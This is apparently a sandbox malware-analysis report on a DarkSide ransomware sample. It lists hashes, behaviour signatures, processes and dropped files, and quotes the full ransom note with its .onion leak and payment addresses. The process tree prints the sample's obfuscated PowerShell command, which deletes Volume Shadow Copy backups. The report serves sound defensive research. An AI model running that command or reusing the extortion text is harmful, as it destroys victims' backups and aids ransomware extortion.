Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    95s
  • max time network
    152s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20250217-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250217-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    06/03/2025, 01:34

General

  • Target

    f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe

  • Size

    1.1MB

  • MD5

    ec0e75c477fc54c92c47788bb9ccc034

  • SHA1

    c7f2264d27ac44beb66f13d383f5ad6671750af0

  • SHA256

    f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef

  • SHA512

    db0408032dc4aade2533feb5261d2688c14a96e572712d45d4d7d6f30895061da8b76cabbbbb4ba9b93d2dda3c26f9d878d4c7c8c5e6df54958875dfad1bc740

  • SSDEEP

    24576:RppmWj2AWJ2Shnp9KTWlaFK1HDe4JU0DFNKq5o2QZNQSGkZ2:RppmVMShnp9KSEFyHDzD3KqcZEW

Malware Config

Extracted

Path

C:\Users\README.ef6b5dca.TXT

Family

darkside

Ransom Note
----------- [ Welcome to Dark ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. Data leak ---------------------------------------------- First of all we have uploaded more then 100 GB data. Example of data: - Accounting data - Executive data - Sales data - Customer Support data - Marketing data - Quality data - And more other... Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC The data is preloaded and will be automatically published if you do not pay. After publication, your data will be available for at least 6 months on our tor cdn servers. We are ready: - To provide you the evidence of stolen data - To give you universal decrypting tool for all encrypted files. - To delete all the stolen data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68 When you open our website, put the following data in the input form: Key: pr9gzRnMz6qEwr6ovMT0cbjd9yT56NctfQZGIiVVLgo0ME2EQpAUyZucG9BLrOJjno5XLPvCN11TFfnlFHa42u5mJxoeR5k5RUgQAC1MC6LBUj4YOOAUyiBrR HQSUM3pzGoEPRVOzXSZ8YqkJyFL0TDFBbWaBKQDOSo9GzKKoVRQ0Eb02F5geTPkTAqZZSfSQ6PBBlTGPSgGe2kCyuwwp7lDmRSJlNnHssMMZHVhXzyZ6fxiBY gNiuusFK8JNI5nrtRPp3bMAc6OEddxfJWj6o2GT1Xg9j87Jp4Oyv43E1J61jLJAWBkmoBB3Gqv07mtyDW5PnmxBlNzABbLFEvJMQL23sR8nnw4svzcZHxrqD1 xRcxqyeKtsaQ5yqLvyQgMdnrI2QoCqkHYYUfBIzjO8BXyBZdmjHanXE57jdDAhjaDUUqfL917cCyJr1uwVR0Xj5lJXe8BIKHd3dFrz70CsIXFAhicOsBlFzIn daNcAXXyL8Fg1avIXOcuEkGRDXt8Cs8b3TAB6n4DrbLJdiFjECo8yCA9pxvzqjXatumUloblWFZaUoLVYzP !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC

http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

  • Darkside family
  • Renames multiple (167) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe
    "C:\Users\Admin\AppData\Local\Temp\f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:5044
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3944
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 916
      2⤵
      • Program crash
      PID:2624
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:6060
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 224 -p 5044 -ip 5044
    1⤵
      PID:3900

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      3KB

      MD5

      4521e67a3b03b060fde700c36d3b9297

      SHA1

      4a730cd86dc7a57ac001d59853dd500c1b83b4ab

      SHA256

      a72aa223a84c4fa011c8a2b0ef2475a83d5123de2cdfa6a7160231729e68383d

      SHA512

      90235850eef71c2f0921d04e6990147af9e76fec8ee49e12e6a5bab065ff0e63331a54be845026f17a7b1dd230ee94843099db4813c127c6bafb8cbaf59b753f

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      68f1fd10d7d7b8885ed45d8451a89c9e

      SHA1

      358aef85c7599e6818a7ea28eedfe1670cf365b6

      SHA256

      99ba4a513afbe189d3e8ad82557ee210f0aa434d92c91e6319c0755a1a78d673

      SHA512

      a35c2b933fae8ef367b87f5c7b8c21328ef78f92dee86ecd5018bbfe46469357b6a4c7927e8cdfb83a094f687e47fb4f9843252372b70e1a8fec78ab679dea19

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uq1woerz.4ac.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\README.ef6b5dca.TXT

      Filesize

      2KB

      MD5

      25d0b19a0ec34a39dfa3e177866f01a3

      SHA1

      a3704d1f6499738ccd694bdd6008a850c6b2e453

      SHA256

      f030ee74e406acb06d43e73c5127df0206e8affc85b95e9895b100d89391dea8

      SHA512

      ede7562f04b5f9abf792196ae87d82e14d651dc70e9a5b5ec0e9cb14d13aba27f8ebfacda2191de48dff882131dfad8c7bad51e7fb89b71dd3bbe748adc77198

    • memory/3944-12-0x00007FF87ECE0000-0x00007FF87F7A2000-memory.dmp

      Filesize

      10.8MB

    • memory/3944-13-0x00007FF87ECE0000-0x00007FF87F7A2000-memory.dmp

      Filesize

      10.8MB

    • memory/3944-14-0x00007FF87ECE0000-0x00007FF87F7A2000-memory.dmp

      Filesize

      10.8MB

    • memory/3944-17-0x00007FF87ECE0000-0x00007FF87F7A2000-memory.dmp

      Filesize

      10.8MB

    • memory/3944-11-0x000001D4EC940000-0x000001D4EC962000-memory.dmp

      Filesize

      136KB

    • memory/3944-1-0x00007FF87ECE3000-0x00007FF87ECE5000-memory.dmp

      Filesize

      8KB

    • memory/5044-0-0x0000000000400000-0x000000000076F000-memory.dmp

      Filesize

      3.4MB

    • memory/5044-231-0x0000000000400000-0x000000000076F000-memory.dmp

      Filesize

      3.4MB

    • memory/5044-232-0x0000000000400000-0x000000000076F000-memory.dmp

      Filesize

      3.4MB

    • memory/5044-234-0x0000000000400000-0x000000000076F000-memory.dmp

      Filesize

      3.4MB

    • memory/5044-236-0x0000000000400000-0x000000000076F000-memory.dmp

      Filesize

      3.4MB

    • memory/5044-237-0x0000000000400000-0x000000000076F000-memory.dmp

      Filesize

      3.4MB

    • memory/5044-239-0x0000000000400000-0x000000000076F000-memory.dmp

      Filesize

      3.4MB